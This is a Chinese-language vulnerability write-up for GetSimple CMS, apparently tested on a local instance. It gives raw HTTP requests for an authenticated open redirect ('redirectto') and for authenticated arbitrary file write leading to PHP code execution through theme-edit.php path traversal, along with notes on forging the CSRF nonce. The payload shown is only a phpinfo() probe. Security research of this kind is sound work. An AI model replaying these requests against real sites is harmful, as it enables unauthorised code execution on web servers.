授权 SSRF 漏洞
登录后构造数据包
POST /admin/changedata.php HTTP/1.1
Host: getsimplecms.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: GS_ADMIN_USERNAME=admin; b16087c538c5e080e5e82057bded19bd08c57ce1=d7cdbbdcbd9efb469568564e0dc767dd74316626
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
submitted=1&post-title=1&nonce=3268d41787c0ee588931a91265eaf87ada4b3939&redirectto=http://www.baidu.com
data:image/s3,"s3://crabby-images/a6c47/a6c477e27a0ef21c559d066a48cdbd6b3de818bf" alt=""
会使得页面跳转到百度页面
admin/changedata.php
data:image/s3,"s3://crabby-images/12645/1264560276d40ce2ca33f88f9a8c63a67156a992" alt=""
构造参数需要满足这三个参数存在,且 nonce 需要满足绕过 CSRF 的校验
admin/inc/security_functions.php#check_nonce
data:image/s3,"s3://crabby-images/90e00/90e000312b0e5b0b2cbb3bd0578eb9c540cd144a" alt=""
admin/inc/security_functions.php#get_nonce
data:image/s3,"s3://crabby-images/292b5/292b59e3fe7e69e650e8787cb1e6b1f4324e509d" alt=""
通过调试和加断点输出可以得到满足条件的值
data:image/s3,"s3://crabby-images/e7470/e74709be881442b2c374a7fab24a3c51e2008ca9" alt=""
最后再传入 redirect_url 的值就是会跳转成功的值
授权代码执行
访问路径
http://getsimplecms.test/admin/theme-edit.php
data:image/s3,"s3://crabby-images/212ea/212eafb62f03cdb1e449513b5f6fc664e506aa83" alt=""
构造数据包
data:image/s3,"s3://crabby-images/c9db4/c9db4023840c7fc091daf7e082b7feb3eb2a2309" alt=""
POST /admin/theme-edit.php?t=Innovation&f=template.php HTTP/1.1
Host: getsimplecms.test
Content-Length: 125
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://getsimplecms.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://getsimplecms.test/admin/theme-edit.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: GS_ADMIN_USERNAME=admin; b16087c538c5e080e5e82057bded19bd08c57ce1=d7cdbbdcbd9efb469568564e0dc767dd74316626
Connection: close
nonce=463c18a33a65591f7b359a3c33de0a373200e9df&content=<%3fphp+phpinfo()%3b%3f>&edited_file=/../a.php&submitsave=Save+Changes
nonce 是防止 csrf 的可以自己构造生成,content 是文件内容 edited_file 是文件名
data:image/s3,"s3://crabby-images/da1e3/da1e3643ed62ba66af919fe90e9ab4a18fd4295c" alt=""
data:image/s3,"s3://crabby-images/0ba14/0ba1497e5464409fdae041d25a96644125c84faa" alt=""
admin/theme-edit.php
data:image/s3,"s3://crabby-images/0ef25/0ef25d667b43453691a59ab4be2040d583ff5c09" alt=""